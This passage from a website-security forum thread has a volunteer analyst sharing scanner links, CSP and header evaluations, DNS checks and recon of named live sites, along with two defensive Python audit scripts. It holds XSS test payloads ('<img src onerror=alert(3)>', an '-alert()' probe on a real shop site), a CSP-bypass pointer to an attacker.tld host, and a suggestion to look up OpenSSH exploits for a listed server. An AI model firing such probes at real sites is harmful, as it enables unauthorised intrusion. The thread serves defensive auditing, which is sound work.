But we also have: https://dazzlepod.com/ip/?ip_address=http%3A%2F%2Fcraft2cart.com  (Netcraft risk score 1 red out of 10).

From Lansing where the site is hosted we can find:
https://www.shodan.io/host/208.79.234.118  together with possible vulnerabilities on that hoster.
Note: the device may not be impacted by all of these issues.
The vulnerabilities are implied based on the software and version.
This, when we combine it with this info here: https://toolbar.netcraft.com/site_report?url=host.purvainfosystems.info

Site was with malware during June this year: https://www.virustotal.com/gui/ip-address/208.79.234.118/relations

And we will find the malware analysis on a malware researcher's resource site like maltiverse,
for craft2cart.com:
created 5 months ago / modified 5 months ago
Bancolombia Personas phishing - Antiphishing.com.ar  av-element detected 

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
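The header hygiene the last few posts keep returning to (missing X-Frame-Options / X-Content-Type-Options / CSP, banners such as PHP/5.6.40 that talk too loud, a session cookie without the Secure flag) as an offline audit. This is an added example, not any of the scanners linked above; SAMPLE_HEADERS is a constructed response modelled on the quoted dump and SAMPLE_CSP a constructed policy of the kind CSP Evaluator flags.

```python
"""Security-header audit: an added example, not the page's own tooling.

Reads a raw HTTP response header block (as printed by `curl -I`) and reports
missing protective headers, version banners, weak cookie flags and, when a
Content-Security-Policy is present, wildcard or unsafe script sources.
"""
from dataclasses import dataclass

# Constructed response, modelled on the header dump quoted in the post.
SAMPLE_HEADERS = """\
HTTP/1.1 200 OK
Date: Wed, 13 Nov 2019 22:35:33 GMT
Server: Apache
X-Powered-By: PHP/5.6.40
Cache-Control: no-store, no-cache, must-revalidate
X-Frame-Options: SAMEORIGIN
Set-Cookie: frontend=SESSION_ID_PLACEHOLDER; Max-Age=3600; path=/; HttpOnly
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
"""

# Constructed policy with the weaknesses CSP Evaluator reports on script-src / object-src.
SAMPLE_CSP = ("default-src data: * 'unsafe-inline'; script-src * 'unsafe-inline' 'unsafe-eval'; "
              "object-src 'self'; frame-ancestors 'self'")

# Headers whose absence weakens the site, and why.
EXPECTED = {
    "content-security-policy": "missing: inline and injected scripts run unrestricted",
    "x-content-type-options": "missing 'nosniff': responses may be MIME-sniffed",
    "x-frame-options": "missing: the page can be framed (clickjacking)",
    "strict-transport-security": "missing HSTS: the first request may go over plain HTTP",
    "referrer-policy": "missing: full URLs may leak to third parties",
}
# Banners that hand out software names and versions the server need not disclose.
BANNERS = ("server", "x-powered-by", "x-aspnet-version")


@dataclass
class Finding:
    severity: str  # "high", "medium" or "low"
    message: str


def parse_headers(raw: str) -> dict:
    """Lower-case 'Name: value' lines into a dict; Set-Cookie may repeat, so it becomes a list."""
    headers: dict = {}
    for line in raw.splitlines()[1:]:  # skip the status line
        if ":" not in line:
            continue
        name, value = (part.strip() for part in line.split(":", 1))
        name = name.lower()
        if name == "set-cookie":
            headers.setdefault(name, []).append(value)
        else:
            headers[name] = value
    return headers


def audit_csp(policy: str) -> list:
    """Flag the script-src / object-src weaknesses that CSP Evaluator reports."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    # script-src and object-src fall back to default-src when they are absent.
    script = directives.get("script-src", directives.get("default-src", []))
    objects = directives.get("object-src", directives.get("default-src", []))
    findings = []
    if "*" in script:
        findings.append(Finding("high", "script-src allows '*' as source"))
    if "'unsafe-inline'" in script:
        findings.append(Finding("high", "script-src 'unsafe-inline' allows in-page scripts and event handlers"))
    if "'unsafe-eval'" in script:
        findings.append(Finding("medium", "script-src 'unsafe-eval' allows code injected into eval()-like APIs"))
    if objects != ["'none'"]:
        findings.append(Finding("medium", "object-src is not restricted to 'none'"))
    return findings


def audit_headers(headers: dict) -> list:
    """Missing protections, loud banners, weak cookies and, when present, the CSP."""
    findings = []
    for name, why in EXPECTED.items():
        if name not in headers:
            findings.append(Finding("medium", f"{name} {why}"))
    for name in BANNERS:
        if name in headers:
            findings.append(Finding("low", f"{name}: {headers[name]} (banner; run the server quiet)"))
    for cookie in headers.get("set-cookie", []):
        cname = cookie.split("=", 1)[0]
        attrs = {a.strip().split("=", 1)[0].lower() for a in cookie.split(";")[1:]}
        for flag in ("secure", "httponly", "samesite"):
            if flag not in attrs:
                findings.append(Finding("medium", f"cookie {cname} lacks {flag}"))
    if "content-security-policy" in headers:
        findings.extend(audit_csp(headers["content-security-policy"]))
    return findings


if __name__ == "__main__":
    for f in audit_headers(parse_headers(SAMPLE_HEADERS)) + audit_csp(SAMPLE_CSP):
        print(f"[{f.severity:6}] {f.message}")
```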

Title: Re: Tests and other Media topics
Post by: polonus on November 14, 2019, 06:35:04 PM
To check settings for your website, use https://hstspreload.org/

See: https://www.globaldots.com/blog/8-http-security-headers-best-practices

HTTP Headers, an extension for your browser to check websites with.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 25, 2019, 12:55:04 AM
SSL checker: https://certlogik.com/ssl-checker/
Also other tools at that site: crt alert and decoder.

Another site with this newer scanner: https://redkestrel.co.uk/products/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 27, 2019, 12:10:52 PM
Read: https://sec-consult.com/en/blog/advisories/weak-encryption-cipher-and-hardcoded-cryptographic-keys-in-fortinet-products/

Want to test a hard-coded key XOR cipher and the weakness grade resembling Caesar or rather Vigenère?
Test here: https://www.dcode.fr/xor-cipher    with many a tool to test encryption.

What did junky Pentesters find -
https://niiconsulting.com/checkmate/2018/05/reverse-engineering-for-beginners-xor-encryption-windows-x64/

Network Intelligence -  XOR is still used, mainly for obfuscation.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 02, 2019, 11:43:45 PM
Too much about blacklists and blacklisting, now are you on this whitelist?

Check: https://www.dnswl.org/?page_id=72

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 03, 2019, 11:37:48 AM
Using middleware inside browsers to speed up DNS-prefetching etc.
Read: https://github.com/helmetjs

DNS Prefetching is being used to resolve hosts faster and get a better load; however, inside Google Chrome it could lead to adverse effects, making web pages load slower, not load at all, etc.

Read: https://www.mydigitallife.net/turn-off-dns-prefetching-in-google-chrome-to-fix-resolving-host-and-cannot-load-page-error/

DNS-prefetching can be turned off or on inside your browser privacy settings.

Test performance here: https://www.webpagetest.org/

Also see test tools here: https://geekflare.com/test-your-website-load-time/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 05, 2019, 01:04:11 PM
Combining DOM-XSS scanning for sinks and sources with retirable jQuery library issues,
we have fine resources here: https://github.com/s0md3v/AwesomeXSS

Find them before they find you  ::)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 05, 2019, 04:57:25 PM
What also could bring a lot of insight on a particular website is when you open it up inside the Developer's Console;
this can be done by pressing Ctrl+Shift+I.
For this website -https://www.grenson.com
we could analyze:
Quote
 
preload.js:64 [Deprecation] Element.createShadowRoot is deprecated and will be removed in M73, around March 2019. Please use Element.attachShadow instead. See https://www.chromestatus.com/features/4507242028072960 for more details.
init @ preload.js:64
content-tss.js:2 content-tss.js loaded:  -https://www.grenson.com/us/'-alert()/
(unknown) hosted page injected
content-ads.js:2 content-ads.js loaded:  -https://www.grenson.com/us/'-alert()/
content.js:21 Uncaught TypeError: Illegal invocation: Function must be called on an object of type StorageArea
    at content.js:21
-www.google-analytics.com/analytics.js:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
-grens11111.pcapredict.com/js/sensor.js:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
(index):1 [DOM] Found 2 elements with non-unique id #email: (More info: -https://goo.gl/9p2vKq) <input type=​"text" name=​"login[username]​" placeholder=​"Email" value id=​"email" class=​"input-text required-entry validate-email" title=​"Email Address">​ <input type=​"text" name=​"login[username]​" placeholder=​"Email" value id=​"email" class=​"input-text required-entry validate-email" title=​"Email Address">​
(index):1 [DOM] Found 2 elements with non-unique id #login-form: (More info: -https://goo.gl/9p2vKq) <form action=​"-https:​/​/​www.grenson.com/​us/​customer/​account/​loginPost/​" method=​"post" id=​"login-form">​…​</form>​ <form action=​"-https:​/​/​www.grenson.com/​us/​customer/​account/​loginPost/​" method=​"post" id=​"login-form">​…​</form>​
(index):1 [DOM] Found 2 elements with non-unique id #pass: (More info: -https://goo.gl/9p2vKq) <input type=​"password" name=​"login[password]​" placeholder=​"Password" class=​"input-text required-entry validate-password" id=​"pass" title=​"Password">​ <input type=​"password" name=​"login[password]​" placeholder=​"Password" class=​"input-text required-entry validate-password" id=​"pass" title=​"Password">​
(index):1 [DOM] Found 4 elements with non-unique id #search: (More info: -https://goo.gl/9p2vKq) <input id=​"search" type=​"text" name=​"q" class=​"input-text" maxlength=​"255" autocomplete=​"off">​ <input id=​"search" type=​"text" name=​"q" class=​"input-text" maxlength=​"255" autocomplete=​"off">​ <input id=​"search" type=​"text" name=​"q" class=​"input-text" maxlength=​"255" autocomplete=​"off">​ <input id=​"search" type=​"text" name=​"q" class=​"input-text" maxlength=​"255" autocomplete=​"off">​
(index):1 [DOM] Found 3 elements with non-unique id #search_mini_form: (More info: https://goo.gl/9p2vKq) <form id=​"search_mini_form" action=​"-https:​/​/​www.grenson.com/​us/​catalogsearch/​result/​" method=​"get">​…​</form>​ <form id=​"search_mini_form" action=​"-https:​/​/​www.grenson.com/​us/​catalogsearch/​result/​" method=​"get">​…​</form>​ <form id=​"search_mini_form" action=​"-https:​/​/​www.grenson.com/​us/​catalogsearch/​result/​" method=​"get">​…​</form>​
(index):1 [DOM] Found 2 elements with non-unique id #send2: (More info: -https://goo.gl/9p2vKq) <button type=​"submit" class=​"button left" title=​"Login" name=​"send" id=​"send2">​…​</button>​ <button type=​"submit" class=​"button left" title=​"Login" name=​"send" id=​"send2">​…​</button>​
(index):1 Unchecked runtime.lastError: Could not establish connection. Receiving end does not exist.
preload.js:64 [Deprecation] Element.createShadowRoot is deprecated and will be removed in M73, around March 2019. Please use Element.attachShadow instead. See -https://www.chromestatus.com/features/4507242028072960 for more details.
init @ preload.js:64
preload.js:64 [Deprecation] Element.createShadowRoot is deprecated and will be removed in M73, around March 2019. Please use Element.attachShadow instead. See h-ttps://www.chromestatus.com/features/4507242028072960 for more details.
init @ preload.js:64
content-tss.js:2 content-tss.js loaded:  -https://www.google.com/recaptcha/api2/anchor?ar=1&k=6Lft7xkUAAAAAJC3_IM8O68WPOJHvttOTN-1dj74&co=aHR0cHM6Ly93d3cuZ3JlbnNvbi5jb206NDQz&hl=en&type=image&v=PRkVene3wKrZUWATSylf69ja&theme=light&size=normal&cb=4wm1rlpfzp0h
(unknown) hosted page injected
content-ads.js:2 content-ads.js loaded:  -https://www.google.com/recaptcha/api2/anchor?ar=1&k=6Lft7xkUAAAAAJC3_IM8O68WPOJHvttOTN-1dj74&co=aHR0cHM6Ly93d3cuZ3JlbnNvbi5jb206NDQz&hl=en&type=image&v=PRkVene3wKrZUWATSylf69ja&theme=light&size=normal&cb=4wm1rlpfzp0h
content.js:21 Uncaught TypeError: Illegal invocation: Function must be called on an object of type StorageArea
    at content.js:21
fingercounting.js:188 Uncaught DOMException: Failed to read the 'sessionStorage' property from 'Window': Access is denied for this document.
    at Counter.wrapMethod (chrome-extension://ommfjecdpepadiafbnidoiggfpbnkfbj/js/web_accessible/fingercounting.js:188:27)
    at new Counter (chrome-extension://ommfjecdpepadiafbnidoiggfpbnkfbj/js/web_accessible/fingercounting.js:160:12)
    at chrome-extension://ommfjecdpepadiafbnidoiggfpbnkfbj/js/web_accessible/fingercounting.js:250:19
    at chrome-extension://ommfjecdpepadiafbnidoiggfpbnkfbj/js/web_accessible/fingercounting.js:255:3
(unknown) caught WebWorker
content-tss.js:2 content-tss.js loaded:  about:blank
(unknown) hosted page injected
content-ads.js:2 content-ads.js loaded:  about:blank
content-tss.js:2 content-tss.js loaded:  about:blank
(unknown) hosted page injected
content-ads.js:2 content-ads.js loaded:  about:blank
content-tss.js:2 content-tss.js loaded:  -https://www.google.com/recaptcha/api2/bframe?hl=en&v=PRkVene3wKrZUWATSylf69ja&k=6Lft7xkUAAAAAJC3_IM8O68WPOJHvttOTN-1dj74&cb=amz0tege1pe4
VM29:5 hosted page injected
content-ads.js:2 content-ads.js loaded:  -https://www.google.com/recaptcha/api2/bframe?hl=en&v=PRkVene3wKrZUWATSylf69ja&k=6Lft7xkUAAAAAJC3_IM8O68WPOJHvttOTN-1dj74&cb=amz0tege1pe4
content.js:21 Uncaught TypeError: Illegal invocation: Function must be called on an object of type StorageArea
    at content.js:21
fingercounting.js:188 Uncaught DOMException: Failed to read the 'sessionStorage' property from 'Window': Access is denied for this document.
    at Counter.wrapMethod (chrome-extension://ommfjecdpepadiafbnidoiggfpbnkfbj/js/web_accessible/fingercounting.js:188:27)
    at new Counter (chrome-extension://ommfjecdpepadiafbnidoiggfpbnkfbj/js/web_accessible/fingercounting.js:160:12)
    at chrome-extension://ommfjecdpepadiafbnidoiggfpbnkfbj/js/web_accessible/fingercounting.js:250:19
    at chrome-extension://ommfjecdpepadiafbnidoiggfpbnkfbj/js/web_accessible/fingercounting.js:255:3
-> -https://www.grenson.com/ and -alert()/# returns a "You could go to previous page... etc.

Enjoy, good hunt

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 06, 2019, 12:51:23 PM
With Retire.JS as an extension in the browser, the retire insecurity today online scanner and also SNYK evaluation (see webhint scanner)
one can establish retirable jQuery libraries, and with DOM-XSS scanners possible sources (input that can be eventually controlled) and sources (methods towards such a goal that can be (ab)used).

Also look here at these resources: https://domstorm.skepticfx.com/modules?id=529bbe6e125fac0000000003

Find these flaws, before they find you, see my test results:
https://domstorm.skepticfx.com/modules?id=529bbe6e125fac0000000003
You can for instance use the user script as User Script (ENUM_FUNCTION) inside Tamper Monkey extension, just an idea.

Test an example of DOM-based XSS here open up inbrowser: https://brutelogic.com.br/tests/sinks.html?name=%3Cimg+src+onerror=alert(3)%3E  Read: https://brutelogic.com.br/blog/dom-based-xss-the-3-sinks/
This is
Quote
Object.create (eval at exec_fn (sinks.html?name=<img+src+onerror=alert(3)>:1),

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 09, 2019, 03:29:05 PM
Two browser extensions that can extend the info detected here:
https://observatory.mozilla.org/analyze/meedoeninarnhem.nl  a random example with C-grade status

are Recx Security Analyser v.1.3.0.4 (described earlier in this section Tests & other Media topics).

and CSP Evaluator ->
Quote
base-uri 'self';
img-src * data: 'unsafe-inline';
default-src data: * 'unsafe-inline';
frame-ancestors 'self';
manifest-src 'self';
media-src *.readspeaker.com *.speechstream.net 'self';
script-src * 'unsafe-inline' 'unsafe-eval';
object-src 'self';

[check] base-uri
  [check] 'self'

[check] img-src
  [check] *
  [check] data:
  [check] 'unsafe-inline'

[check] default-src
  [check] data:
  [check] *
  [check] 'unsafe-inline'

[check] frame-ancestors
  [check] 'self'

[check] manifest-src
  [check] 'self'

[check] media-src
  [check] *.readspeaker.com
  [check] *.speechstream.net
  [check] 'self'

[error] script-src
  [error] *
    script-src should not allow '*' as source
  [error] 'unsafe-inline'
    'unsafe-inline' allows the execution of unsafe in-page scripts and event handlers.
  [help_outline] 'unsafe-eval'
    'unsafe-eval' allows the execution of code injected into DOM APIs such as eval().

[help_outline] object-src
  [help_outline] 'self'
    Can you restrict object-src to 'none' only?

Legend
[error] High severity finding
[error] Medium severity finding
[help_outline] Possible high severity finding
[remove] Directive/value is ignored in this version of CSP
[help_outline] Possible medium severity finding
[clear] Syntax error
[info_outline] Information
[check] All good


Could be also combined with results from https://webcookies.org/cookies/www.arnhem.nl/15998357

Enjoy, my good friends, enjoy,

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 10, 2019, 01:45:02 PM
Test websites for Dutch NCSC TLS-guidelines: https://internet.nl/

10 online tool -> https://geekflare.com/ssl-test-certificate/

Check site's cert fingerprint with this here: https://www.grc.com/fingerprints.htm

Each site's authentic security certificate fingerprint (shown above) was just now obtained by GRC's servers from each target web
server. If your web browser sees a different fingerprint for the same certificate (carefully verify the Certificate Name is identical) that
forms strong evidence that something is intercepting your web browser's secure connections and is creating fraudulent site certificates.   

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 14, 2019, 11:14:01 PM
You will find trackers reported, for instance through DNS Query Sniffer tool,
then check here: https://whotracks.me/trackers/gstatic.html
Also compare this search tool with insecure tracking found with Tracker SSL extension.

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 16, 2019, 02:54:39 PM
Looking for alternatives for urlquery dot net, now it is more often down than up:
https://postmodernsecurity.com/2015/09/11/malware-analysis-and-incident-response-tools-for-the-frugal-and-lazy/
Examples from there: https://forum.avast.com/index.php?action=post;topic=129271.735;last_msg=1529228 (random example);
also: https://fortiguard.com/webfilter?q=justshopclub.com
Also do an IP scan: https://www.shodan.io/host/31.192.111.83  to be verified at VT IP relations; you can use the VT4Browsers extension.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 25, 2019, 01:42:39 PM
L.S.

Hunting for website errors that could be exploited, I stumbled upon this in the CSP arena:
Often CSP security is wrongly implemented or in cases can be circumvented.
Read: https://github.com/qazbnm456/awesome-web-security  (see the CSP security section)
Also for instance: https://github.com/portswigger/irule-detector

I have this installed in the browser: CSP Evaluator extension.
See response headers in Web Developer extension for particular websites.
Also Evading CSP with DOM-based dangling markup

For instance we have CSP evaluation for https://observatory.mozilla.org/
with a possible medium severity finding with "script-src 'self'".
As 'self' can be problematic if you host JSONP, Angular or user uploaded files.
Which is not true as we check here: https://urlscan.io/result/2170f2aa-7870-4748-b629-7f246e95b6ae#behaviour

Seems folks have only just begun implementing strong Content Security Policies
and evaluating whether some attacker can bypass them.

Also XSS scanning could be worthwhile: https://labs.detectify.com/2016/04/04/csp-bypassing-form-action-with-reflected-xss/
Can be combined with CSP bypasser via http://attacker.tld/link-subresource (link not found), still something of a push,
so read here: https://news.ycombinator.com/item?id=14077955

For security researchers and analysers/pentesters, this is the season just for some back-up reading on these subjects,
and to further protection against such weaknesses. Enjoy, my friends, enjoy,

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on December 25, 2019, 10:00:59 PM
Random example of such a CSP Evaluation:

CSP Evaluated for the Sucuri SiteChek website: High Security Findings 2.
Quote
[error] script-src [missing]
  script-src directive is missing.

[error] object-src [missing]
  Missing object-src allows the injection of plugins which can execute JavaScript. Can you set it to 'none'?


Page meta security headers not set securely set for (missing) /
Upgrade insecure-requests CSP Header HTTP Security Header  RECX Security Analyser.

I would expect an A grade result, not a B+ like: https://observatory.mozilla.org/analyze/sitecheck.sucuri.net

Content Security Policy      -20   Content Security Policy (CSP) implemented unsafely.

This includes 'unsafe-inline' or data: inside script-src, overly broad sources such as https: inside object-src or script-src, or not restricting the sources for object-src or script-src.
Quote
Content Security Policy Analysis
Test   Pass
Blocks execution of inline JavaScript by not allowing 'unsafe-inline' inside script-src   X
Blocks execution of JavaScript's eval() function by not allowing 'unsafe-eval' inside script-src   V
Blocks execution of plug-ins, using object-src restrictions   X
Blocks inline styles by not allowing 'unsafe-inline' inside style-src   X
Blocks loading of active content over HTTP or FTP   V
Blocks loading of passive content over HTTP or FTP   V
Clickjacking protection, using frame-ancestors   X
Deny by default, using default-src 'none'   X
Restricts use of the <base> tag by using base-uri 'none', base-uri 'self', or specific origins   X
Restricts where <form> contents may be submitted by using form-action 'none', form-action 'self', or specific URIs   X
Uses CSP3's 'strict-dynamic' directive to allow dynamic script loading (optional)   -
V = green (pass), X = red (fail)

polonus
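A small checker added here for illustration (not the code of Google's CSP Evaluator or of Mozilla Observatory) that reproduces the script-src, object-src and base-uri checks quoted in this post and in the earlier evaluations in this thread; the first two policies are the ones quoted above, the hardened one is constructed:

```python
from __future__ import annotations
from dataclasses import dataclass

# Policies as quoted in this thread (meedoeninarnhem.nl, sitecheck.sucuri.net)
# plus a constructed hardened policy for comparison.
POLICY_ARNHEM = ("base-uri 'self'; img-src * data: 'unsafe-inline'; "
                 "default-src data: * 'unsafe-inline'; frame-ancestors 'self'; "
                 "manifest-src 'self'; media-src *.readspeaker.com *.speechstream.net 'self'; "
                 "script-src * 'unsafe-inline' 'unsafe-eval'; object-src 'self'")
POLICY_SUCURI = "upgrade-insecure-requests"
POLICY_HARDENED = ("default-src 'none'; script-src 'nonce-r4nd0m' 'strict-dynamic'; "
                   "object-src 'none'; base-uri 'none'")   # constructed example


@dataclass
class Finding:
    severity: str    # "high", "medium", "possible-high" or "info", as in the evaluator's legend
    directive: str
    value: str
    message: str


def parse_csp(header: str) -> dict[str, list[str]]:
    """Split a Content-Security-Policy header into {directive: [source tokens]}.
    Directives are ';'-separated, tokens whitespace-separated, names case-insensitive;
    browsers honour only the first occurrence of a directive, so do we."""
    policy: dict[str, list[str]] = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy


def effective(policy: dict[str, list[str]], name: str) -> tuple[str | None, list[str]]:
    """Fetch directives such as script-src and object-src fall back to default-src."""
    if name in policy:
        return name, policy[name]
    if "default-src" in policy:
        return "default-src", policy["default-src"]
    return None, []


def evaluate_csp(header: str) -> list[Finding]:
    policy = parse_csp(header)
    findings: list[Finding] = []

    directive, sources = effective(policy, "script-src")
    if directive is None:
        findings.append(Finding("high", "script-src", "[missing]",
                                "script-src directive is missing."))
    else:
        lowered = [s.lower() for s in sources]
        nonce_or_hash = any(s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-"))
                            for s in lowered)
        strict_dynamic = "'strict-dynamic'" in lowered
        for src in lowered:
            if src == "'unsafe-inline'":
                if nonce_or_hash:   # CSP2: a nonce or hash makes 'unsafe-inline' inert
                    findings.append(Finding("info", directive, src,
                                            "ignored because a nonce or hash is present"))
                else:
                    findings.append(Finding("high", directive, src,
                                            "allows the execution of unsafe in-page scripts and event handlers."))
            elif src == "'unsafe-eval'":
                findings.append(Finding("possible-high", directive, src,
                                        "allows the execution of code injected into DOM APIs such as eval()."))
            elif src in ("*", "https:", "http:") and not strict_dynamic:
                # host and scheme allow-lists are ignored once 'strict-dynamic' is set
                findings.append(Finding("high", directive, src,
                                        f"{src} in {directive} allows the execution of unsafe scripts."))

    directive, sources = effective(policy, "object-src")
    if directive is None:
        findings.append(Finding("high", "object-src", "[missing]",
                                "Missing object-src allows the injection of plugins which can execute JavaScript."))
    elif [s.lower() for s in sources] != ["'none'"]:
        findings.append(Finding("possible-high", directive, " ".join(sources),
                                "Can you restrict object-src to 'none' only?"))

    if "base-uri" not in policy:
        findings.append(Finding("medium", "base-uri", "[missing]",
                                "No base-uri allows injected <base> tags to redirect relative URLs."))
    return findings


def report(header: str) -> str:
    """One line per finding, highest severity first, for quick reading."""
    order = {"high": 0, "medium": 1, "possible-high": 2, "info": 3}
    rows = sorted(evaluate_csp(header), key=lambda f: order[f.severity])
    return "\n".join(f"[{f.severity}] {f.directive} {f.value}: {f.message}" for f in rows) \
        or "[check] no findings"


if __name__ == "__main__":
    for name, policy in [("meedoeninarnhem.nl", POLICY_ARNHEM),
                         ("sitecheck.sucuri.net", POLICY_SUCURI),
                         ("hardened (constructed)", POLICY_HARDENED)]:
        print(f"== {name}\n{report(policy)}\n")
```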
Title: Re: Tests and other Media topics
Post by: polonus on December 27, 2019, 02:53:30 PM
L.S.

Another evaluation of CSP on this website: -> https://www.sitejabber.com/reviews/htbridge.com
Quote
frame-ancestors 'none'; *
script-src [missing]
  script-src directive is missing.

[error] object-src [missing]
  Missing object-src allows the injection of plugins which can execute JavaScript. Can you set it to 'none'?
Also: https://observatory.mozilla.org/analyze/www.sitejabber.com#third-party
https://observatory.mozilla.org/analyze/www.sitejabber.com
and https://securityheaders.com/?followRedirects=on&hide=on&q=www.sitejabber.com
and https://report-uri.com/home/analyse/https%3A%2F%2Fwww.sitejabber.com%2F   (* same results)

On header security: https://securityheaders.com/?q=https%3A%2F%2Fwww.sitejabber.com%2Freviews%2Fhtbridge.com&followRedirects=on

Also consider: https://webcookies.org/cookies/www.sitejabber.com/28801934?542749

On the hoster: Server: Apache/2.4.18
Quote
The header exposes web server version details. These serve no purpose apart from making the life of security auditors and hackers easier, leading them straight to exploits for this particular version of the product.

No base-uri allows attackers to inject base tags which override the base URI to an attacker-controlled origin. Set to 'none' unless you need to handle tricky relative URLs scheme

Username Enumeration exploit(s) - view host details: https://www.shodan.io/host/52.4.241.179

look for SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8 exploits

Note: 1. the device may not be impacted by all of these issues. The vulnerabilities are implied based on the software and version.
         2. Another threat with detected Google Tag Manager:
             https://blog.sucuri.net/2018/04/malicious-activities-google-tag-manager.html

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 28, 2019, 02:26:48 PM
The State of JavaScript 2019
jQuery just has slightly over 11% of user-base left now: https://2019.stateofjs.com/
React and Angular.js the way to go?

Interesting: https://2019.stateofjs.com/testing/  & https://2019.stateofjs.com/other-tools/

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 28, 2019, 04:04:35 PM
Various domain checks: https://www.zonemaster.net/domain_check
The following nameservers failed to resolve to an IP address : -ns-02.avast.com, -ns-06.avast.com.

35% only here: https://en.internet.nl/site/avast.com/735290/
Consider also: https://mxtoolbox.com/SuperTool.aspx?action=mx%3asecurity.nl&run=toolpage#

8 problems found: https://mxtoolbox.com/domain/avast.com/

Just F-grade here: https://observatory.mozilla.org/analyze/avast.com (was an earlier -B grade).

A & C-scan results: https://observatory.mozilla.org/analyze/avast.com#third-party

Not vulnerable to TLS-Robot attack. (https://www.tbs-certificates.co.uk/FAQ/en/outils-scan-ssl-tls.html)

Not compliant: https://observatory.mozilla.org/analyze/avast.com#tls
See for improvement to modern times: https://wiki.mozilla.org/Security/Server_Side_TLS#Modern_compatibility
Moderate: avast.com
New test
YOUR SCORE:
Unfortunately, the tested resource isn’t running on the latest TLS 1.3.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 29, 2019, 10:54:55 PM
A nice collection of tools can be found here ->: https://report-uri.com/home/analyse
Among them an additional CSP Analyser.
Additional CSP inspection and validation ->: https://cspvalidator.org/#url=https://cspvalidator.org/

Checking the one with the other gives
Quote
Valid policy at -> https://report-uri.com/home/analyseView
Raw Policy
Warning
1:462: The child-src directive is deprecated as of CSP level 3. Authors who wish to regulate nested browsing contexts and workers SHOULD use the frame-src and worker-src directives, respectively.

1:502: The upgrade-insecure-requests directive is an experimental directive that will be likely added to the CSP specification.

Info
1:529: A draft of the next version of CSP deprecates report-uri in favour of a new report-to directive.
So well worthy to bookmark this website address, when website developers have need of this additional inspection and validation  ;)  (Remember: online nothing is a 100% foolproof best policy, today's standards aren't tomorrow's).

Inside Avast Secure Browser I now use CSP Evaluator extension and CSP Tester extension next to JNote extension,
a JavaScript error notifier.

So we keep collecting various interesting tools for our toolboxes.

Check and test well into the coming new year 2020, my good friends, enjoy.

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 29, 2019, 11:33:45 PM
For those that are about to have a Content Security Policy set out,

Inspecting and testing CSP for -https://sitecheck.sucuri.net

I found when validating CSP Strings it had "upgrade-insecure-requests", an experimental directive
that will be likely added to the CSP specification.

Adding script-src gave "directive is missing"
and for "object-src", that when this is missing injections of plug-ins which can execute JS is possible.
So it is better to set it to 'none'.

Just with the online and extension versions of CSP validation that was a lesson we have just learned today,
and we were also able to give feedback to the folks behind https://cspvalidator.org/#url=https://report-uri.com/home/analyse

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 01, 2020, 10:07:56 PM
In the light of what we read here about malicious manipulation of DNS:
https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html

Some online checking of DNS: https://toolbox.googleapps.com/apps/dig/?csrfmiddlewaretoken=k1EQjzk0oBDc5We7ZT4V4vwQ5IqtlIsI&domain=security.nl&typ=A#SRV/

Tests for modern standards: https://en.internet.nl/

Furthermore: https://dnschecker.org  &  https://mxtoolbox.com/DNSCheck-aspx

Checking DNS propagation: https://www.nexcess.net/web-tools/dns-checker/

polonus
Title: Re: Tests and other Media topics
Post by: DavidR on January 01, 2020, 10:28:42 PM
Reference the DNS info above, I can recall Firefox are introducing additional measures for secure DNS connections, a bit like https secure connections.  I commented on how/if avast would deal with this additional protection level.

This was the post by Asyn:
https://forum.avast.com/index.php?topic=19387.msg1530670#msg1530670 (https://forum.avast.com/index.php?topic=19387.msg1530670#msg1530670)

And my comment:
I wonder if/how this might impact the Avast HTTPS scanning ?
Title: Re: Tests and other Media topics
Post by: polonus on January 01, 2020, 11:46:57 PM
Hi DavidR,

Some issues for DNS resolving will not be fixed, like for instance PTR requests for NXDOMAINs.
Read: https://blogs.microsoft.com/on-the-issues/2019/12/30/microsoft-court-action-against-nation-state-cybercrime/

The overhaul or even partial overhaul of the DNS infrastructure will not materialize, I am afraid. Not even in a minimal sense.

And considering DoH recently being brought into Firefox, there are grave concerns from some that it may just enhance Big Tech's grip.

But I cannot see anything wrong with bringing in Google's site verification, very important when sites are just starting to resolve.

Maybe we should enter into a way of encrypting DNS requests, there are some android apps that can do this.

polonus


Title: Re: Tests and other Media topics
Post by: polonus on January 02, 2020, 11:31:21 AM
An example where digging goes wrong.
DNS lookup fails with "254.242.55.65.in-addr.arpa" for instance.

DNSQuerySniffer, running under the browser, does not come up with a reply and cannot resolve.
You often experience that with PTR requests that involve MS.

So then looked here:
Quote
id 7223
opcode QUERY
rcode NXDOMAIN
flags QR RD RA
;QUESTION
